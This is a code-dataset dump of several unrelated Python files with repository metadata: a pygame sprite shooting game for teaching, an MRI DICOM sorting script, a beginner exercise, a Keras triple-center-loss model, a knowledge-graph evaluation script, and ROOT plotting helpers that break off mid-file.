678fd8a74cf26d7b268a0bca0a0e1bb094c0044b | 1b6fd0e1da9aa6d28b19540887ffcb5233ac3692 | /Resources/RP01/P01.4/shooting_005.py | f7c4565e4a016f5f60b0c5ef8bfa949852f8b00f | [] | no_license | rugbyprof/4443-2D-PyGame | a637cd1237f90ca30a484d9fb2b6738571777d8c | bba26f794bd85599cf0598c1c64feec59fa31246 | refs/heads/master | 2022-11-27T14:14:54.982351 | 2020-08-05T19:32:45 | 2020-08-05T19:32:45 | 271,365,653 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 18,569 | py | """
Sprite Sounds and Collision
Description:
"""
# Import and initialize the pygame library
import pygame
import random
import json
import pprint
import sys
import os
import math
import glob
from helper_module import rgb_colors
from helper_module import mykwargs
from helper_module import straightDistance
from helper_module import getCardinalDirection
# Import pygame.locals for easier access to key coordinates
# Updated to conform to flake8 and black standards
from pygame.locals import (
K_UP,
K_DOWN,
K_LEFT,
K_RIGHT,
K_ESCAPE,
KEYDOWN,
QUIT,
)
# Keep up with the config stuff. Adding sprite sheets for
# characters and other graphics now
config = {
'title' :'P01.3 Pygame Sprite Movement',
'window_size' : {
'width' : 640,
'height' : 480
},
'sprite_sheets':{
'explosion_01':{'path':'./media/fx/explosion_01'},
'explosion_02':{'path':'./media/fx/green_blob_explosion_01'},
'explosion_03':{'path':'./media/fx/blood_explosion'},
'explosion_04':{'path':'./media/fx/blood_explosion_v2'},
'green_monster':{'path':'./media/characters/green_monster'},
'pac_man_orange':{'path':'./media/characters/pacman_ghost_orange'},
'pac_man_red':{'path':'./media/characters/pacman_ghost_red'},
'pac_man_pink':{'path':'./media/characters/pacman_ghost_pink'},
'pac_man_blue':{'path':'./media/characters/pacman_ghost_blue'},
'random':{'path':'./media/collections/pacman_items'},
},
'images':{
'bad_guy':{'path':'./media/collections/shoot_example/silhouette.png'},
'green_bullet':{'path':'./media/collections/shoot_example/green_bullet.png'},
},
'sounds':{
'game_track':'./media/sounds/game_track.ogg',
'kill_sound':'./media/sounds/boom_01.ogg',
'head_shot':'./media/sounds/head_shot.ogg',
},
'background':'./media/backgrounds/tile_1000x1000_40_light.png',
'fps':60
}
colors = rgb_colors('colors.json')
def LoadJson(path,filetype):
""" load a json file for whatever you need!
"""
if not os.path.isdir(path):
print(f"Error: {path} not a valid folder!")
sys.exit()
if not os.path.isfile(os.path.join(path,filetype)):
print(f"Error: {filetype} is required to be in folder!")
sys.exit()
# open the json file thats expected to be in the folder
# and read it in as a string
f = open(os.path.join(path,filetype),"r")
# make raw string into a python dictionary
data = json.loads(f.read())
return data
def LoadSpriteImages(path):
""" Load sprite images into either a dictionary of moves or a list of images depending
on whether the "sprite" is a multi move character or a single effect with just frames
to play.
This method reads a json file looking for the following formats (right now):
"""
# make raw string into a python dictionary
sprite_info = LoadJson(path,"moves.json")
# base name is used to build filename
base_name = sprite_info['base_name']
# ext as well
ext = sprite_info['ext']
# If moves is a key in the dictionary then we create a dictionary of
# of moves where each move points to a list of images for that move
if 'moves' in sprite_info:
moves = {}
for move,nums in sprite_info['moves'].items():
moves[move] = []
for num in nums:
moves[move].append(os.path.join(path,base_name+num+ext))
return moves
# If frames in the dictionary, then its an effect with a list of images
# for that effect. We need to order them before return since glob
# doesn't get directory items in order.
elif 'frames' in sprite_info:
images = sprite_info['frames']
if type(images) == list:
pass
elif type(images) == str and images == '*':
images = glob.glob(os.path.join(path,'*'+ext))
images.sort()
return images
else:
print(f"Error: 'moves' or 'frames' key not in json!!")
sys.exit()
class Explosion(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# get location of sprites for this animation
fx_sprites = kwargs.get('fx_sprites',None)
# if not throw error
if not fx_sprites:
print("Error: Need location of fx_sprites!")
sys.exit(0)
self.center = kwargs.get('loc',(0,0))
# This function finds the json file and loads all the
# image names into a list
self.images = LoadSpriteImages(fx_sprites)
# container for all the pygame images
self.frames = []
# load images and "convert" them. (see link at top for explanation)
for image in self.images:
self.frames.append(pygame.image.load(image))
# animation variables
self.frame = 0
self.last_update = pygame.time.get_ticks()
self.frame_rate = 0 # smaller = faster
# prime the animation
self.image = self.frames[0]
self.rect = self.image.get_rect()
self.rect.center = self.center
def setLocation(self,loc):
""" Set the center of the explosion
"""
self.center = loc
self.rect.center = loc
def update(self):
""" Overloaded method from sprite which gets called by the game loop when
a sprite group gets updated
"""
now = pygame.time.get_ticks() # get current game clock
if now - self.last_update > self.frame_rate: #
self.last_update = now
self.frame += 1
if self.frame == len(self.frames):
self.kill()
self.frame = 0
else:
center = self.rect.center
self.image = self.frames[self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
class Explosion(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# get location of sprites for this animation
fx_sprites = kwargs.get('fx_sprites',None)
# if not throw error
if not fx_sprites:
print("Error: Need location of fx_sprites!")
sys.exit(0)
self.center = kwargs.get('loc',(0,0))
# This function finds the json file and loads all the
# image names into a list
self.images = LoadSpriteImages(fx_sprites)
# container for all the pygame images
self.frames = []
# load images and "convert" them. (see link at top for explanation)
for image in self.images:
self.frames.append(pygame.image.load(image))
# animation variables
self.frame = 0
self.last_update = pygame.time.get_ticks()
self.frame_rate = 0 # smaller = faster
# prime the animation
self.image = self.frames[0]
self.rect = self.image.get_rect()
self.rect.center = self.center
def setLocation(self,loc):
""" Set the center of the explosion
"""
self.center = loc
self.rect.center = loc
def update(self):
""" Overloaded method from sprite which gets called by the game loop when
a sprite group gets updated
"""
now = pygame.time.get_ticks() # get current game clock
if now - self.last_update > self.frame_rate: #
self.last_update = now
self.frame += 1
if self.frame == len(self.frames):
self.kill()
self.frame = 0
else:
center = self.rect.center
self.image = self.frames[self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
class Player(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# get location of sprites for this animation
player_sprites = kwargs.get('player_sprites',None)
# if not throw error
if not player_sprites:
print("Error: Need location of player_sprites!")
sys.exit(0)
self.center = kwargs.get('loc',(0,0))
# This function finds the json file and loads all the
# image names into a list
self.animation_images = LoadSpriteImages(player_sprites)
# container for all the pygame images
self.sprites = {}
# load images and "convert" them. (see link at top for explanation)
for anim,imglist in self.animation_images.items():
self.sprites[anim] = []
for img in imglist:
self.sprites[anim].append(pygame.image.load(img))
pprint.pprint(self.sprites)
# animation variables
self.animations = list(self.sprites.keys())
print(self.animations)
self.gameover = False
self.frame = 0
self.action = 'down'
self.last_update = pygame.time.get_ticks()
self.frame_rate = 50
# prime the animation
self.image = self.sprites[self.action][self.frame]
self.rect = self.image.get_rect()
self.rect.center = self.center
self.dx = 1
self.dy = 1
self.speed = 3
self.shoot_delay = 150
self.last_shot = pygame.time.get_ticks()
self.shoot_sound = pygame.mixer.Sound("./media/sounds/gun-shot.ogg")
self.shoot_sound.set_volume(0.5)
def move(self):
keystate = pygame.key.get_pressed()
self.dx = 0
self.dy = 0
if keystate[pygame.K_UP]:
self.dy = -1
if keystate[pygame.K_DOWN]:
self.dy = 1
if keystate[pygame.K_LEFT]:
self.dx = -1
if keystate[pygame.K_RIGHT]:
self.dx = 1
if keystate[pygame.K_SPACE]:
#self.shoot()
pass
x = self.rect.centerx + (self.speed * self.dx)
y = self.rect.centery + (self.speed * self.dy)
self.rect.center = (x,y)
def choose_animation(self):
""" Returns nothing if dx and dy == 0
But do we want to move when 0,0 ??
"""
action = ''
if self.dy == -1:
action += 'up'
if self.dy == 1:
action += 'down'
if self.dx == -1:
action += 'left'
if self.dx == 1:
action += 'right'
return action
def endlife(self):
""" Sets class variables to end everything
"""
self.frame_rate = 60
self.gameover = True
self.action = 'die'
self.frame = 0
def update(self):
""" Updating players state
"""
if not self.gameover:
self.move() # update dx and dy
old_action = self.action
# use dx and dy to pick action (direction)
self.action = self.choose_animation()
if self.action == '':
self.action = old_action
center = self.rect.center
self.image = self.sprites[old_action][0]
self.rect = self.image.get_rect()
self.rect.center = center
return
self.image = self.sprites[self.action][self.frame]
now = pygame.time.get_ticks() # get current game clock
if now - self.last_update > self.frame_rate: #
self.last_update = now
self.frame += 1
if self.frame == len(self.sprites[self.action]):
self.frame = 0
if self.gameover:
self.kill()
else:
center = self.rect.center
self.image = self.sprites[self.action][self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
def shoot(self,target):
now = pygame.time.get_ticks()
if now - self.last_shot > self.shoot_delay:
self.last_shot = now
bullet = Bullet1(self.rect.centerx, self.rect.centery,target[0],target[1])
self.shoot_sound.play()
return bullet
return None
class Mob(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
self.game_width = config['window_size']['width']
self.game_height = config['window_size']['height']
self.new_size = kwargs.get('new_size',(10,15))
# get location of sprites for this animation
path = kwargs.get('path',None)
self.center = kwargs.get('loc',(random.randint(10,self.game_width-10),random.randint(10,self.game_height-10)))
# if not throw error
if not path:
print("Error: Need path of sprites!")
sys.exit(0)
# prime the animation
self.image = pygame.image.load(os.path.join(path))
self.image = pygame.transform.scale(self.image, self.new_size)
self.rect = self.image.get_rect()
self.rect.center = self.center
self.dx = 0
self.dy = 0
# make sure items aren't motionless
while self.dx + self.dy == 0:
self.dx = random.choice([-1,0,1])
self.dy = random.choice([-1,0,1])
self.speed = 3
self.speed = 3
def update(self):
if self.rect.centerx <= 0 or self.rect.centerx >= self.game_width:
self.dx *= -1
if self.rect.centery <= 0 or self.rect.centery >= self.game_height:
self.dy *= -1
x = self.rect.centerx + (self.speed * self.dx)
y = self.rect.centery + (self.speed * self.dy)
self.rect.center = (x,y)
class Bullet2(pygame.sprite.Sprite):
def __init__(self, **kwargs):
# Initiate this sprite
pygame.sprite.Sprite.__init__(self)
# Project Assignment Part 4 !!
class Bullet1(pygame.sprite.Sprite):
def __init__(self, x, y,target_x,target_y):
pygame.sprite.Sprite.__init__(self)
self.x = x
self.y = y
self.target_x = target_x
self.target_y = target_y
self.game_width = config['window_size']['width']
self.game_height = config['window_size']['height']
self.image = pygame.image.load(config['images']['green_bullet']['path'])
self.rect = self.image.get_rect()
self.rect.bottom = y
self.rect.centerx = x
self.speed = 10
self.angle = self.CalcDirection()
def CalcDirection(self):
""" returns the angle in which to send the bullet
"""
# Get the angle to move (in radians)
dx = self.target_x - self.x
dy = self.target_y - self.y
return math.atan2(dy, dx)
def offWorld(self):
return self.rect.bottom < 0 or self.rect.right < 0 or self.rect.left > self.game_width or self.rect.top > self.game_height
def update(self):
self.rect.x += int(self.speed * math.cos(self.angle))
self.rect.y += int(self.speed * math.sin(self.angle))
# kill if it moves off the top of the screen
if self.offWorld():
self.kill()
def main():
pygame.init()
# sets the window title
pygame.display.set_caption(config['title'])
# Game size of game window from config
width = config['window_size']['width']
height = config['window_size']['height']
# Set up the drawing window
screen = pygame.display.set_mode((width,height))
# load our background
background = pygame.image.load(config['background'])
# sprite group to handle all the visuals
all_sprites = pygame.sprite.Group()
mob_group = pygame.sprite.Group()
player_group = pygame.sprite.Group()
bullets_group = pygame.sprite.Group()
# help control event timing
clock = pygame.time.Clock()
player = Player(player_sprites=config['sprite_sheets']['pac_man_orange']['path'],loc=(random.randint(0,width),random.randint(0,height)))
player_group.add(player)
for i in range(10):
m = Mob(path=config['images']['bad_guy']['path'],new_size=(20,30))
mob_group.add(m)
all_sprites.add(m)
all_sprites.add(player)
# Setup for sounds. Defaults are good.
pygame.mixer.init()
# pygame.mixer.music.load("./media/sounds/game_track.ogg")
game_track = pygame.mixer.Sound(config['sounds']['game_track'])
kill_sound = pygame.mixer.Sound(config['sounds']['kill_sound'])
head_shot = pygame.mixer.Sound(config['sounds']['head_shot'])
#pygame.mixer.sound.play()
game_track.set_volume(0.5)
game_track.play(loops=-1)
# Run until the user asks to quit
# game loop
running = True
while running:
clock.tick(config['fps'])
# fill screen with white
screen.fill(colors['white'])
# show background grid (no moving it)
screen.blit(background, (0,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.KEYDOWN:
event.key
if event.type == pygame.KEYUP:
event.key
if event.type == pygame.MOUSEMOTION:
pass
if event.type == pygame.MOUSEBUTTONUP:
bullet = player.shoot(pygame.mouse.get_pos())
if bullet:
all_sprites.add(bullet)
bullets_group.add(bullet)
#shoot_sound.play()
all_sprites.update()
for item in mob_group:
gets_hit = pygame.sprite.collide_rect(item, player)
if gets_hit:
item.kill()
# check to see if a bullet hit a mob
hits = pygame.sprite.groupcollide(mob_group, bullets_group, True, True)
for hit in hits:
e = Explosion(fx_sprites=config['sprite_sheets']['explosion_04']['path'],loc=hit.rect.center)
print(hit)
kill_sound.play()
all_sprites.add(e)
all_sprites.draw(screen)
pygame.display.flip()
# Done! Time to quit.
pygame.quit()
if __name__=='__main__':
main()
| [
"[email protected]"
] | |
ec9d3ab0161bd0be2d1d9cc810b7baf064cb9258 | 0c110eb32f2eaea5c65d40bda846ddc05757ced6 | /scripts/mastersort/scripts_dir/p7477_run1L6.py | fd95e6f425fc95d1d5f1740df9048f4676b66a4c | [] | no_license | nyspisoccog/ks_scripts | 792148a288d1a9d808e397c1d2e93deda2580ff4 | 744b5a9dfa0f958062fc66e0331613faaaee5419 | refs/heads/master | 2021-01-18T14:22:25.291331 | 2018-10-15T13:08:24 | 2018-10-15T13:08:24 | 46,814,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,199 | py | from __future__ import with_statement
import os, csv, shutil,tarfile, uf, dcm_ops
dest_root = '/ifs/scratch/pimri/soccog/test_working'
dst_path_lst = ['7477', 'run1L6']
uf.buildtree(dest_root, dst_path_lst)
uf.copytree('/ifs/scratch/pimri/soccog/old/SocCog_Raw_Data_By_Exam_Number/2539/E2539_e2401779/s2411337_1904_1L6_s10', '/ifs/scratch/pimri/soccog/test_working/7477/run1L6')
t = tarfile.open(os.path.join('/ifs/scratch/pimri/soccog/test_working/7477/run1L6','MRDC_files.tar.gz'), 'r')
t.extractall('/ifs/scratch/pimri/soccog/test_working/7477/run1L6')
for f in os.listdir('/ifs/scratch/pimri/soccog/test_working/7477/run1L6'):
if 'MRDC' in f and 'gz' not in f:
old = os.path.join('/ifs/scratch/pimri/soccog/test_working/7477/run1L6', f)
new = os.path.join('/ifs/scratch/pimri/soccog/test_working/7477/run1L6', f + '.dcm')
os.rename(old, new)
qsub_cnv_out = dcm_ops.cnv_dcm('/ifs/scratch/pimri/soccog/test_working/7477/run1L6', '7477_run1L6', '/ifs/scratch/pimri/soccog/scripts/mastersort/scripts_dir/cnv')
#qsub_cln_out = dcm_ops.cnv_dcm('/ifs/scratch/pimri/soccog/test_working/7477/run1L6', '7477_run1L6', '/ifs/scratch/pimri/soccog/scripts/mastersort/scripts_dir/cln')
| [
"[email protected]"
] | |
f0e45b1fb4b83b8df90170a17ff2e2c3e5ee84de | 7d8b5220152b4ef4876c489d6648be56bc83c8e7 | /exercises/development/beginner/exercise_12.py | 78175e5a2f27eacb75544c488c37742e2dba2c08 | [
"CC-BY-4.0",
"ISC",
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | comp-think/comp-think.github.io | 8f89518e7a463376b431f55fb7f495cb3019d4a5 | e48a7ecf3b1799471271e01430e089e8f8e3c68d | refs/heads/master | 2023-01-04T20:38:27.593237 | 2023-01-02T14:48:54 | 2023-01-02T14:48:54 | 157,171,226 | 52 | 22 | NOASSERTION | 2023-01-02T14:48:55 | 2018-11-12T07:11:23 | Python | UTF-8 | Python | false | false | 1,189 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, Silvio Peroni <[email protected]>
#
# Permission to use, copy, modify, and/or distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright notice
# and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
# DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.
# Test case for the function
def test_f(n1, n2, expected):
result = f(n1, n2)
if expected == result:
return True
else:
return False
# Code of the function
def f(n1, n2):
n = n1 - n2
if n < 0:
n = -n
return list(range(n))
# Tests
print(test_f(3, 4, [0]))
print(test_f(4, 2, [0, 1]))
print(test_f(9, 0, [0, 1, 2, 3, 4, 5, 6, 7, 8]))
| [
"[email protected]"
] | |
ad38a8f2cb5608beb486c95d05efd28affd3e33f | 2bccab3cea54fdf283533d91b4a88363847b565d | /triple-center-loss/triple_center_model.py | 50bfb7111808affc301bed6a03c61cf867c47ae2 | [] | no_license | AmberzzZZ/classification_keras | 647727597cc086cc72f532583ad80c6d88ecdce8 | 8e1886f130452b0f5ad30f7e9a32eb8388babb9a | refs/heads/master | 2020-08-28T22:51:53.832386 | 2020-05-26T02:35:44 | 2020-05-26T02:35:44 | 217,844,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,274 | py | from models import *
from keras.layers import Embedding, Lambda
import tensorflow as tf
from keras.utils import to_categorical
from keras.utils import plot_model
def TCL(y_true, y_pred):
return y_pred
def l2distance(args, n_classes):
embedding, center_standard, y_true = args
n_centers = center_standard.shape[0]
lst = []
for i in range(n_centers):
lst.append(K.sum(K.square(embedding-center_standard[i,0,:]), 1, keepdims=True))
distances = K.concatenate(lst, axis=1)
classes = K.arange(0, n_classes, dtype=tf.float32)
y_true = K.repeat_elements(y_true, n_classes, axis=1)
mask = K.cast(K.equal(y_true, classes), dtype=tf.float32)
inter_distances = tf.where(tf.equal(mask, 0.0), distances, np.inf*tf.ones_like(mask))
min_inter_distance = tf.math.reduce_min(inter_distances, axis=1, keepdims=True)
intra_distances = tf.where(tf.equal(mask, 1.0), distances, np.inf*tf.ones_like(mask))
intra_distance = tf.math.reduce_min(intra_distances, axis=1, keepdims=True)
return [intra_distance, min_inter_distance]
def sharedEmbedding(n_classes, embedding_size, x):
return Embedding(n_classes, embedding_size)(x)
def triple_center_model(lr=3e-4, input_shape=(512,512,1), n_classes=10, m=4):
x_input = Input(shape=input_shape)
basemodel = base_model(input_shape)
embedding = basemodel(x_input) # (None,100)
# cls branch
softmax = Dense(n_classes, activation='softmax')(embedding) # dense3
# center branch
embedding_size = embedding.shape.as_list()[-1] # 100: the outdim of dense1
y_input = Input((1,))
# ##### past calculation of l2_loss, keep to compare ####
# center = sharedEmbedding(n_classes, embedding_size, y_input)
# l2_loss = Lambda(lambda x: K.sum(K.square(x[0] - x[1][:, 0]), 1, keepdims=True), name='l2_loss')([embedding, center])
# #####
labels = np.arange(n_classes).reshape([-1,1])
y_standard_input = Input(tensor=K.constant(labels)) # (10,1) assume n_classes=10
center_standard = sharedEmbedding(n_classes, embedding_size, y_standard_input) # (10, 1, 100)
intra_distance, min_inter_distance = Lambda(l2distance, arguments={'n_classes': n_classes},
name='l2distance')([embedding, center_standard, y_input])
triplet_center_loss = Lambda(lambda x: K.maximum(x[0]+m-x[1],0),
name='triple_center_loss')([intra_distance, min_inter_distance])
model = Model(inputs=[x_input, y_input, y_standard_input], outputs=[softmax, triplet_center_loss])
sgd = SGD(lr, momentum=0.9, decay=1e-6, nesterov=True)
adam = Adam(lr, beta_1=0.9, beta_2=0.999)
model.compile(optimizer=adam,
loss=['categorical_crossentropy', TCL],
metrics=['acc']) # loss_weights
return model
if __name__ == '__main__':
train_path = "data/train/"
val_path = "data/val/"
n_classes = 3
target_size = 28
batch_size = 128
x_train, y_train = loadData(train_path, target_size)
x_train = np.expand_dims(x_train, axis=-1)
y_train = to_categorical(y_train, num_classes=n_classes)
print(x_train.shape, y_train.shape)
model = triple_center_model(lr=3e-4, input_shape=(target_size,target_size,1), n_classes=n_classes)
# plot_model(model, to_file='triple_center_model.png', show_shapes=True, show_layer_names=True)
filepath = "./triple_center_model_{epoch:02d}_val_acc_{dense_2_acc:.3f}.h5"
checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')
y_dummy = np.zeros((x_train.shape[0], 1))
model.fit(x=[x_train, y_dummy],
y=[y_train, y_dummy],
batch_size=batch_size,
epochs=100, verbose=1,
callbacks=[checkpoint],
validation_split=0.2)
# model.load_weights('triple_center_model_01_val_acc_0.981.h5', by_name=True)
# img = cv2.imread("data/test/d2/d2_0002.png", 0)
# img = cv2.resize(img, (target_size, target_size))
# tmp = np.reshape(img, (1, target_size, target_size, 1))
# dummy = np.array([1])
# preds = model.predict([tmp, dummy])[0]
# print(preds)
# label = np.argmax(preds)
# print(label)
| [
"[email protected]"
] | |
2f810088c1d7c89839e81cd9c11e22c2d9e2f920 | 1185c629b091e09366aec9830d09ecd1b51dddda | /eval.py | 7fee4cd1b8819c5d70a410ec118be451f76e6231 | [] | no_license | billy-inn/refe | 9ed79b8cfed83225cbc81a8637d0bafc24e0e494 | deeaa1934ea7011e22dc7d3d98eedd6144212c7e | refs/heads/master | 2021-07-03T20:26:47.329020 | 2017-09-24T02:33:16 | 2017-09-24T02:33:16 | 104,605,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 946 | py | import tensorflow as tf
import numpy as np
import pandas as pd
import config
from optparse import OptionParser
from task import Task
import logging
from model_param_space import param_space_dict
def train(model_name, data_name, params_dict, logger):
task = Task(model_name, data_name, 1, params_dict, logger)
task.refit()
def parse_args(parser):
parser.add_option("-m", "--model", dest="model_name", type="string", default="best_TransE_L2")
parser.add_option("-d", "--data", dest="data_name", type="string", default="wn18")
options, args = parser.parse_args()
return options, args
def main(options):
logger = logging.getLogger()
logging.basicConfig(format='[%(asctime)s] %(levelname)s: %(message)s',level=logging.INFO)
train(options.model_name, options.data_name, params_dict=param_space_dict[options.model_name], logger=logger)
if __name__ == "__main__":
parser = OptionParser()
options, args = parse_args(parser)
main(options)
| [
"[email protected]"
] | |
432654325fa3c3e4ef2b5dea97f3ff81125a84ac | 52f8d1c53d7a7a251b216cacc2d1aaa8cc60c33e | /tools/utils.py | edef9d3436684af263ef426b90366eae0859b595 | [] | no_license | sbein/BayesQcd2019 | d9ecbf252b336f1d18c9dd35828bde1331a0028a | bb259e6d95e7eeee8d655866cbb7eeaa3e476036 | refs/heads/master | 2022-02-22T20:24:19.008157 | 2019-08-08T07:53:44 | 2019-08-08T07:53:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,416 | py | from ROOT import *
from array import array
tl = TLatex()
tl.SetNDC()
cmsTextFont = 61
extraTextFont = 50
lumiTextSize = 0.6
lumiTextOffset = 0.2
cmsTextSize = 0.75
cmsTextOffset = 0.1
regularfont = 42
originalfont = tl.GetTextFont()
epsi = "#scale[1.3]{#font[122]{e}}"
epsilon = 0.0001
binning = {}
binning['Met']=[45,0,450]
binning['HardMet']=binning['Met']
binning['MetSignificance']=[0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7, 2.8, 2.9, 3.0, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6, 3.7, 3.8, 3.9, 4.0, 4.1, 4.2, 4.3, 4.4, 4.5, 4.6, 4.7, 4.8, 4.9, 5.0, 5.1, 5.2, 5.3, 5.4, 5.5, 5.6, 5.7, 5.8, 5.9, 6.0, 6.1, 6.2, 6.3, 6.4, 6.5, 6.6, 6.7, 6.8, 6.9, 7.0, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6, 8.7, 8.8, 8.9, 9.0, 9.1, 9.2, 9.3, 9.4, 9.5, 9.6, 9.7, 9.8, 9.9, 10.0, 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 10.7, 10.8, 10.9, 11.0, 11.1, 11.2, 11.3, 11.4, 11.5, 11.6, 11.7, 11.8, 11.9, 12.0]
binning['NJets']=[10,0,10]
binning['NLeptons']=[5,0,5]
binning['NElectrons']=binning['NLeptons']
binning['NPhotons']=binning['NLeptons']
binning['NMuons']=binning['NLeptons']
binning['NTags']=[3,0,3]
binning['NPix']=binning['NTags']
binning['NPixStrips']=binning['NTags']
binning['BTags']=[4,0,4]
binning['Ht']=[10,0,2000]
binning['St']=binning['Ht']
binning['MinDPhiHardMetJets'] = [16,0,3.2]
binning['DPhiPhoPho'] = [16,0,3.2]
binning['DPhi1']=[16,0,3.2]
binning['DPhi2']=[16,0,3.2]
binning['DPhi3']=[16,0,3.2]
binning['DPhi4']=[16,0,3.2]
binning['Track1MassFromDedx'] = [25,0,1000]
binning['BinNumber'] = [34,0,34]
binning['MinDeltaPhi'] = binning['DPhi1']
binningUser = dict(binning)
binningUser['HardMet'] = [0,10,20,30,40,50,60,70,80,90,100,110,120,130,140,150,160,170,180,200,250,450]
#binningUser['HardMet'] = [15,0,300]
#binningUser['HardMet'] = [30,20,920]
binning_templates = {}
binning_templates['HardMet']=[300,0,600]
binning_templates['HardMet']=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,155,160,165,170,175,180,185,190,195,200,220,240,260,280,300,400,500,800]
binning_templates['Met']=binning_templates['HardMet']
binning_templates['MetSignificance']=binning['MetSignificance']
binning_templates['Ht']=[0,300,500,700,1000,1500,2000,10000]
binning_templates['Ht']=[0,200,300,500,700,1000,1500,2000,10000]#NOV2016 removed "400"
binning_templates['Ht']=[1,0,10000]# in delphes, no apparent dependence of gen-MHT on HT
binning_templates['St']=binning['Ht']
binning_templates['NJets']=[10,0,10]
binning_templates['BTags']=[0,1,2,5]
binning_templates['Jet1Pt']=[20,0,800]
binning_templates['Jet1Eta']=[20,-3,3]
binning_templates['Jet2Pt']=[20,0,800]
binning_templates['Jet2Eta']=[20,-3,3]
binning_templates['Jet3Pt']=[20,0,800]
binning_templates['Jet3Eta']=[20,-3,3]
binning_templates['Jet4Pt']=[20,0,800]
binning_templates['Jet4Eta']=[20,-3,3]
binning_templates['DPhi1']=[126,0,3.15]
#binning_templates['DPhi1']=[126,-3.15,3.15]
binning_templates['DPhi2']=binning_templates['DPhi1']
binning_templates['DPhi3']=binning_templates['DPhi1']
binning_templates['DPhi4']=binning_templates['DPhi1']
binning_templates['MaxHemJetPt']=[20,0,100]
binning_templates['DPhiPhoPho'] = [16,0,3.2]
def histoStyler(h,color=kBlack):
h.SetLineWidth(2)
h.SetLineColor(color)
h.SetMarkerColor(color)
#h.SetFillColor(color)
size = 0.059
font = 132
h.GetXaxis().SetLabelFont(font)
h.GetYaxis().SetLabelFont(font)
h.GetXaxis().SetTitleFont(font)
h.GetYaxis().SetTitleFont(font)
h.GetYaxis().SetTitleSize(size)
h.GetXaxis().SetTitleSize(size)
h.GetXaxis().SetLabelSize(size)
h.GetYaxis().SetLabelSize(size)
h.GetXaxis().SetTitleOffset(1.0)
h.GetYaxis().SetTitleOffset(1.05)
if not h.GetSumw2N(): h.Sumw2()
def makeHist(name, title, nb, low, high, color):
h = TH1F(name,title,nb,low,high)
histoStyler(h,color)
return h
def makeTh1(name, title, nbins, low, high, color=kBlack):
h = TH1F(name, title, nbins, low, high)
histoStyler(h, color)
return h
def makeTh1VB(name, title, nbins, arrayOfBins):
h = TH1F(name, title, nbins, np.asarray(arrayOfBins, 'd'))
histoStyler(h, 1)
return h
def makeTh2(name, title, nbinsx, lowx, highx, nbinsy, lowy, highy):
h = TH2F(name, title, nbinsx, lowx, highx, nbinsy, lowy, highy)
histoStyler(h)
return h
def makeTh2VB(name, title, nbinsx, arrayOfBinsx, nbinsy, arrayOfBinsy):
h = TH2F(name, title, nbinsx, np.asarray(arrayOfBinsx, 'd'), nbinsy, np.asarray(arrayOfBinsy, 'd'))
histoStyler(h)
return h
def graphStyler(g,color):
g.SetLineWidth(2)
g.SetLineColor(color)
g.SetMarkerColor(color)
#g.SetFillColor(color)
size = 0.055
font = 132
g.GetXaxis().SetLabelFont(font)
g.GetYaxis().SetLabelFont(font)
g.GetXaxis().SetTitleFont(font)
g.GetYaxis().SetTitleFont(font)
g.GetYaxis().SetTitleSize(size)
g.GetXaxis().SetTitleSize(size)
g.GetXaxis().SetLabelSize(size)
g.GetYaxis().SetLabelSize(size)
g.GetXaxis().SetTitleOffset(1.0)
g.GetYaxis().SetTitleOffset(1.05)
def mkcanvas(name='c1'):
c1 = TCanvas(name,name,750,630)
c1.SetBottomMargin(.15)
c1.SetLeftMargin(.14)
#c1.SetTopMargin(.13)
#c1.SetRightMargin(.04)
return c1
def mkcanvas_wide(name):
c1 = TCanvas(name,name,1200,700)
c1.Divide(2,1)
c1.GetPad(1).SetBottomMargin(.14)
c1.GetPad(1).SetLeftMargin(.14)
c1.GetPad(2).SetBottomMargin(.14)
c1.GetPad(2).SetLeftMargin(.14)
